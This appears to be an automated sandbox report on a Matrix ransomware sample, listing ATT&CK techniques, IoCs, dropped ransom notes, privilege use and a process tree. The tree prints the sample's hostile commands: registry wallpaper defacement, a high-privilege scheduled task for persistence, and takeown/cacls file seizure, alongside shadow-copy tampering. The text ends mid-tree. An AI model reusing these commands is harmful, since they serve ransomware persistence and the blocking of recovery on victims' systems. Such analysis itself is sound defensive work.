matrix | 224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914

Peripheral Device Discovery

T1120

System Information Discovery

Processes:

new_jdpr.exee905pXEL64.exe

description	ioc	Process
File opened (read-only)	\??\U:	new_jdpr.exe
File opened (read-only)	\??\S:	new_jdpr.exe
File opened (read-only)	\??\N:	new_jdpr.exe
File opened (read-only)	\??\J:	new_jdpr.exe
File opened (read-only)	\??\B:	e905pXEL64.exe
File opened (read-only)	\??\Q:	e905pXEL64.exe
File opened (read-only)	\??\X:	e905pXEL64.exe
File opened (read-only)	\??\M:	new_jdpr.exe
File opened (read-only)	\??\A:	e905pXEL64.exe
File opened (read-only)	\??\T:	e905pXEL64.exe
File opened (read-only)	\??\Y:	new_jdpr.exe
File opened (read-only)	\??\F:	e905pXEL64.exe
File opened (read-only)	\??\I:	e905pXEL64.exe
File opened (read-only)	\??\N:	e905pXEL64.exe
File opened (read-only)	\??\Z:	e905pXEL64.exe
File opened (read-only)	\??\K:	e905pXEL64.exe
File opened (read-only)	\??\Z:	new_jdpr.exe
File opened (read-only)	\??\V:	new_jdpr.exe
File opened (read-only)	\??\T:	new_jdpr.exe
File opened (read-only)	\??\I:	new_jdpr.exe
File opened (read-only)	\??\G:	new_jdpr.exe
File opened (read-only)	\??\E:	e905pXEL64.exe
File opened (read-only)	\??\J:	e905pXEL64.exe
File opened (read-only)	\??\W:	e905pXEL64.exe
File opened (read-only)	\??\X:	new_jdpr.exe
File opened (read-only)	\??\W:	new_jdpr.exe
File opened (read-only)	\??\U:	e905pXEL64.exe
File opened (read-only)	\??\H:	new_jdpr.exe
File opened (read-only)	\??\E:	new_jdpr.exe
File opened (read-only)	\??\G:	e905pXEL64.exe
File opened (read-only)	\??\O:	e905pXEL64.exe
File opened (read-only)	\??\P:	e905pXEL64.exe
File opened (read-only)	\??\S:	e905pXEL64.exe
File opened (read-only)	\??\V:	e905pXEL64.exe
File opened (read-only)	\??\Q:	new_jdpr.exe
File opened (read-only)	\??\P:	new_jdpr.exe
File opened (read-only)	\??\O:	new_jdpr.exe
File opened (read-only)	\??\L:	new_jdpr.exe
File opened (read-only)	\??\M:	e905pXEL64.exe
File opened (read-only)	\??\Y:	e905pXEL64.exe
File opened (read-only)	\??\R:	new_jdpr.exe
File opened (read-only)	\??\K:	new_jdpr.exe
File opened (read-only)	\??\F:	new_jdpr.exe
File opened (read-only)	\??\H:	e905pXEL64.exe
File opened (read-only)	\??\L:	e905pXEL64.exe
File opened (read-only)	\??\R:	e905pXEL64.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

reg.exe

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\7ZPKpRzd.bmp"	reg.exe

Drops file in Program Files directory 64 IoCs

Processes:

new_jdpr.exe

description	ioc	Process
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\playlist\twitch.luac	new_jdpr.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\playlist\anevia_streams.luac	new_jdpr.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\sk-sk\ui-strings.js	new_jdpr.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\[email protected]	new_jdpr.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\fr-fr\JDPR_README.rtf	new_jdpr.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\hu-hu\JDPR_README.rtf	new_jdpr.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\ro-ro\JDPR_README.rtf	new_jdpr.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\JDPR_README.rtf	new_jdpr.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\jre\lib\images\cursors\win32_MoveNoDrop32x32.gif	new_jdpr.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\review_same_reviewers.gif	new_jdpr.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\de-de\JDPR_README.rtf	new_jdpr.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\AcroForm\PMP\QRCode.pmp	new_jdpr.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\faf_icons.png	new_jdpr.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-host-remote_ja.jar	new_jdpr.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\images\icons_retina.png	new_jdpr.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\IDTemplates\ENU\AdobeID.pdf	new_jdpr.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\jre\lib\images\cursors\invalid32x32.gif	new_jdpr.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\en-us\AppStore_icon.svg	new_jdpr.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\en-ae\JDPR_README.rtf	new_jdpr.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\86.0.4240.111\Locales\uk.pak	new_jdpr.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\cs-cz\JDPR_README.rtf	new_jdpr.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\eu-es\ui-strings.js	new_jdpr.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\ja-jp\ui-strings.js	new_jdpr.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\sl-si\JDPR_README.rtf	new_jdpr.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\root\JDPR_README.rtf	new_jdpr.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\fr-fr\JDPR_README.rtf	new_jdpr.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\hi_contrast\core_icons_highcontrast_retina.png	new_jdpr.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\lib\boot.jar	new_jdpr.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\epl-v10.html	new_jdpr.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.di_1.0.0.v20140328-2112.jar	new_jdpr.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\back-arrow-disabled.svg	new_jdpr.exe
File created	C:\Program Files\VideoLAN\VLC\locale\fa\LC_MESSAGES\JDPR_README.rtf	new_jdpr.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\email\themes\dark\adobe_logo.png	new_jdpr.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\share_icons.png	new_jdpr.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-templates_zh_CN.jar	new_jdpr.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.service.exsd	new_jdpr.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\zh-cn\JDPR_README.rtf	new_jdpr.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\images\themes\dark\JDPR_README.rtf	new_jdpr.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\JDPR_README.rtf	new_jdpr.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\ca-es\JDPR_README.rtf	new_jdpr.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\tool-search-2x.png	new_jdpr.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\zh-cn\JDPR_README.rtf	new_jdpr.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\es-es\JDPR_README.rtf	new_jdpr.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\check-mark-1x.png	new_jdpr.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_filter-dark-focus_32.svg	new_jdpr.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\sl-si\ui-strings.js	new_jdpr.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\it-it\JDPR_README.rtf	new_jdpr.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Scan_R_RHP.aapp	new_jdpr.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\themes\dark\s_shared_multi_filetype.svg	new_jdpr.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\lt_get.svg	new_jdpr.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\images\rhp_world_icon.png	new_jdpr.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_checkbox_partialselected-default_18.svg	new_jdpr.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\pl-pl\ui-strings.js	new_jdpr.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-core-kit_ja.jar	new_jdpr.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\ta\LC_MESSAGES\vlc.mo	new_jdpr.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\ca-es\JDPR_README.rtf	new_jdpr.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\flags.png	new_jdpr.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\ca-es\ui-strings.js	new_jdpr.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winClassicTSFrame.png	new_jdpr.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\find-text.png	new_jdpr.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\fi_get.svg	new_jdpr.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\plugins\rhp\JDPR_README.rtf	new_jdpr.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\ja-jp\JDPR_README.rtf	new_jdpr.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\tr-tr\JDPR_README.rtf	new_jdpr.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

Processes:

WINWORD.EXE

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

Processes:

schtasks.exe

pid	Process
188	schtasks.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

System Information Discovery

Processes:

WINWORD.EXE

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Interacts with shadow copies 2 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

Processes:

vssadmin.exe

pid	Process
4908	vssadmin.exe

Suspicious behavior: AddClipboardFormatListener 2 IoCs

Processes:

WINWORD.EXE

pid	Process
5624	WINWORD.EXE
5624	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 8 IoCs

Processes:

e905pXEL64.exe

pid	Process
3652	e905pXEL64.exe
3652	e905pXEL64.exe
3652	e905pXEL64.exe
3652	e905pXEL64.exe
3652	e905pXEL64.exe
3652	e905pXEL64.exe
3652	e905pXEL64.exe
3652	e905pXEL64.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

e905pXEL64.exe

pid	Process
3652	e905pXEL64.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

takeown.exee905pXEL64.exetakeown.exevssvc.exeWMIC.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exe

description	pid	Process
Token: SeTakeOwnershipPrivilege	3544	takeown.exe
Token: SeDebugPrivilege	3652	e905pXEL64.exe
Token: SeLoadDriverPrivilege	3652	e905pXEL64.exe
Token: SeTakeOwnershipPrivilege	204	takeown.exe
Token: SeBackupPrivilege	4688	vssvc.exe
Token: SeRestorePrivilege	4688	vssvc.exe
Token: SeAuditPrivilege	4688	vssvc.exe
Token: SeIncreaseQuotaPrivilege	4600	WMIC.exe
Token: SeSecurityPrivilege	4600	WMIC.exe
Token: SeTakeOwnershipPrivilege	4600	WMIC.exe
Token: SeLoadDriverPrivilege	4600	WMIC.exe
Token: SeSystemProfilePrivilege	4600	WMIC.exe
Token: SeSystemtimePrivilege	4600	WMIC.exe
Token: SeProfSingleProcessPrivilege	4600	WMIC.exe
Token: SeIncBasePriorityPrivilege	4600	WMIC.exe
Token: SeCreatePagefilePrivilege	4600	WMIC.exe
Token: SeBackupPrivilege	4600	WMIC.exe
Token: SeRestorePrivilege	4600	WMIC.exe
Token: SeShutdownPrivilege	4600	WMIC.exe
Token: SeDebugPrivilege	4600	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4600	WMIC.exe
Token: SeRemoteShutdownPrivilege	4600	WMIC.exe
Token: SeUndockPrivilege	4600	WMIC.exe
Token: SeManageVolumePrivilege	4600	WMIC.exe
Token: 33	4600	WMIC.exe
Token: 34	4600	WMIC.exe
Token: 35	4600	WMIC.exe
Token: 36	4600	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4600	WMIC.exe
Token: SeSecurityPrivilege	4600	WMIC.exe
Token: SeTakeOwnershipPrivilege	4600	WMIC.exe
Token: SeLoadDriverPrivilege	4600	WMIC.exe
Token: SeSystemProfilePrivilege	4600	WMIC.exe
Token: SeSystemtimePrivilege	4600	WMIC.exe
Token: SeProfSingleProcessPrivilege	4600	WMIC.exe
Token: SeIncBasePriorityPrivilege	4600	WMIC.exe
Token: SeCreatePagefilePrivilege	4600	WMIC.exe
Token: SeBackupPrivilege	4600	WMIC.exe
Token: SeRestorePrivilege	4600	WMIC.exe
Token: SeShutdownPrivilege	4600	WMIC.exe
Token: SeDebugPrivilege	4600	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4600	WMIC.exe
Token: SeRemoteShutdownPrivilege	4600	WMIC.exe
Token: SeUndockPrivilege	4600	WMIC.exe
Token: SeManageVolumePrivilege	4600	WMIC.exe
Token: 33	4600	WMIC.exe
Token: 34	4600	WMIC.exe
Token: 35	4600	WMIC.exe
Token: 36	4600	WMIC.exe
Token: SeTakeOwnershipPrivilege	2060	takeown.exe
Token: SeTakeOwnershipPrivilege	2584	takeown.exe
Token: SeTakeOwnershipPrivilege	4496	takeown.exe
Token: SeTakeOwnershipPrivilege	4908	takeown.exe
Token: SeTakeOwnershipPrivilege	3656	takeown.exe
Token: SeTakeOwnershipPrivilege	720	takeown.exe
Token: SeTakeOwnershipPrivilege	4632	takeown.exe
Token: SeTakeOwnershipPrivilege	3488	takeown.exe
Token: SeTakeOwnershipPrivilege	3588	takeown.exe
Token: SeTakeOwnershipPrivilege	4212	takeown.exe
Token: SeTakeOwnershipPrivilege	200	takeown.exe
Token: SeTakeOwnershipPrivilege	4248	takeown.exe
Token: SeTakeOwnershipPrivilege	1524	takeown.exe
Token: SeTakeOwnershipPrivilege	4792	takeown.exe
Token: SeTakeOwnershipPrivilege	3940	takeown.exe

Suspicious use of SetWindowsHookEx 8 IoCs

Processes:

WINWORD.EXE

pid	Process
5624	WINWORD.EXE
5624	WINWORD.EXE
5624	WINWORD.EXE
5624	WINWORD.EXE
5624	WINWORD.EXE
5624	WINWORD.EXE
5624	WINWORD.EXE
5624	WINWORD.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

new_jdpr.execmd.execmd.exewscript.execmd.execmd.execmd.execmd.execmd.exee905pXEL.exe

description	pid	Process	procid_target
PID 4800 wrote to memory of 2816	4800	new_jdpr.exe	74
PID 4800 wrote to memory of 2816	4800	new_jdpr.exe	74
PID 4800 wrote to memory of 2816	4800	new_jdpr.exe	74
PID 4800 wrote to memory of 3700	4800	new_jdpr.exe	76
PID 4800 wrote to memory of 3700	4800	new_jdpr.exe	76
PID 4800 wrote to memory of 3700	4800	new_jdpr.exe	76
PID 4800 wrote to memory of 3984	4800	new_jdpr.exe	83
PID 4800 wrote to memory of 3984	4800	new_jdpr.exe	83
PID 4800 wrote to memory of 3984	4800	new_jdpr.exe	83
PID 4800 wrote to memory of 4068	4800	new_jdpr.exe	86
PID 4800 wrote to memory of 4068	4800	new_jdpr.exe	86
PID 4800 wrote to memory of 4068	4800	new_jdpr.exe	86
PID 3984 wrote to memory of 4440	3984	cmd.exe	87
PID 3984 wrote to memory of 4440	3984	cmd.exe	87
PID 3984 wrote to memory of 4440	3984	cmd.exe	87
PID 4068 wrote to memory of 4576	4068	cmd.exe	88
PID 4068 wrote to memory of 4576	4068	cmd.exe	88
PID 4068 wrote to memory of 4576	4068	cmd.exe	88
PID 3984 wrote to memory of 4584	3984	cmd.exe	89
PID 3984 wrote to memory of 4584	3984	cmd.exe	89
PID 3984 wrote to memory of 4584	3984	cmd.exe	89
PID 4800 wrote to memory of 4604	4800	new_jdpr.exe	90
PID 4800 wrote to memory of 4604	4800	new_jdpr.exe	90
PID 4800 wrote to memory of 4604	4800	new_jdpr.exe	90
PID 4576 wrote to memory of 4760	4576	wscript.exe	93
PID 4576 wrote to memory of 4760	4576	wscript.exe	93
PID 4576 wrote to memory of 4760	4576	wscript.exe	93
PID 3984 wrote to memory of 228	3984	cmd.exe	95
PID 3984 wrote to memory of 228	3984	cmd.exe	95
PID 3984 wrote to memory of 228	3984	cmd.exe	95
PID 4760 wrote to memory of 188	4760	cmd.exe	96
PID 4760 wrote to memory of 188	4760	cmd.exe	96
PID 4760 wrote to memory of 188	4760	cmd.exe	96
PID 4604 wrote to memory of 4516	4604	cmd.exe	97
PID 4604 wrote to memory of 4516	4604	cmd.exe	97
PID 4604 wrote to memory of 4516	4604	cmd.exe	97
PID 4604 wrote to memory of 672	4604	cmd.exe	99
PID 4604 wrote to memory of 672	4604	cmd.exe	99
PID 4604 wrote to memory of 672	4604	cmd.exe	99
PID 4576 wrote to memory of 708	4576	wscript.exe	98
PID 4576 wrote to memory of 708	4576	wscript.exe	98
PID 4576 wrote to memory of 708	4576	wscript.exe	98
PID 708 wrote to memory of 2148	708	cmd.exe	101
PID 708 wrote to memory of 2148	708	cmd.exe	101
PID 708 wrote to memory of 2148	708	cmd.exe	101
PID 4604 wrote to memory of 2528	4604	cmd.exe	102
PID 4604 wrote to memory of 2528	4604	cmd.exe	102
PID 4604 wrote to memory of 2528	4604	cmd.exe	102
PID 2528 wrote to memory of 3124	2528	cmd.exe	104
PID 2528 wrote to memory of 3124	2528	cmd.exe	104
PID 2528 wrote to memory of 3124	2528	cmd.exe	104
PID 4800 wrote to memory of 4736	4800	new_jdpr.exe	105
PID 4800 wrote to memory of 4736	4800	new_jdpr.exe	105
PID 4800 wrote to memory of 4736	4800	new_jdpr.exe	105
PID 4736 wrote to memory of 3068	4736	cmd.exe	107
PID 4736 wrote to memory of 3068	4736	cmd.exe	107
PID 4736 wrote to memory of 3068	4736	cmd.exe	107
PID 4736 wrote to memory of 3544	4736	cmd.exe	108
PID 4736 wrote to memory of 3544	4736	cmd.exe	108
PID 4736 wrote to memory of 3544	4736	cmd.exe	108
PID 3124 wrote to memory of 3652	3124	e905pXEL.exe	109
PID 3124 wrote to memory of 3652	3124	e905pXEL.exe	109
PID 4736 wrote to memory of 4080	4736	cmd.exe	110
PID 4736 wrote to memory of 4080	4736	cmd.exe	110

C:\Users\Admin\AppData\Local\Temp\new_jdpr.exe
"C:\Users\Admin\AppData\Local\Temp\new_jdpr.exe"
1⤵
- Matrix Ransomware
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:4800
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\new_jdpr.exe" "C:\Users\Admin\AppData\Local\Temp\NWGesn9z.exe"
  2⤵
  PID:2816
- C:\Users\Admin\AppData\Local\Temp\NWGesn9z.exe
  "C:\Users\Admin\AppData\Local\Temp\NWGesn9z.exe" -n
  2⤵
  - Executes dropped EXE
  PID:3700
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\7ZPKpRzd.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3984
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\7ZPKpRzd.bmp" /f
    3⤵
    - Sets desktop wallpaper using registry
    PID:4440
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f
    3⤵
    PID:4584
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
    3⤵
    PID:228
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\zJlayFkZ.vbs"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4068
- - C:\Windows\SysWOW64\wscript.exe
    wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\zJlayFkZ.vbs"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4576
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\fWONOKas.bat" /sc minute /mo 5 /RL HIGHEST /F
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4760
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\fWONOKas.bat" /sc minute /mo 5 /RL HIGHEST /F
        5⤵
        Creates scheduled task(s)
        
        PID:188
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA
      4⤵
      Suspicious use of WriteProcessMemory
      PID:708
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Run /I /tn DSHCA
        5⤵
        
        PID:2148
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zmawqXJM.bat" "C:\Users\All Users\Microsoft\Network\Downloader\qmgr.db""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4604
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Network\Downloader\qmgr.db" /E /G Admin:F /C
    3⤵
    PID:4516
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Network\Downloader\qmgr.db"
    3⤵
    - Modifies file permissions
    PID:672
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c e905pXEL.exe -accepteula "qmgr.db" -nobanner
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2528
  - - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
      e905pXEL.exe -accepteula "qmgr.db" -nobanner
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:3124
    - - C:\Users\Admin\AppData\Local\Temp\e905pXEL64.exe
        
        e905pXEL.exe -accepteula "qmgr.db" -nobanner
        5⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Enumerates connected drives
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: LoadsDriver
        Suspicious use of AdjustPrivilegeToken
        
        PID:3652
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zmawqXJM.bat" "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.db""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4736
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.db" /E /G Admin:F /C
    3⤵
    PID:3068
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.db"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:3544
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c e905pXEL.exe -accepteula "SmsInterceptStore.db" -nobanner
    3⤵
    PID:4080
  - - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
      e905pXEL.exe -accepteula "SmsInterceptStore.db" -nobanner
      4⤵
      Executes dropped EXE
      PID:4076
- - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
    e905pXEL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4336
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zmawqXJM.bat" "C:\Program Files\Java\jdk1.8.0_66\jre\bin\server\classes.jsa""
  2⤵
  PID:4232
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Java\jdk1.8.0_66\jre\bin\server\classes.jsa" /E /G Admin:F /C
    3⤵
    PID:3092
- - C:\Windows\SysWOW64\takeown.exe
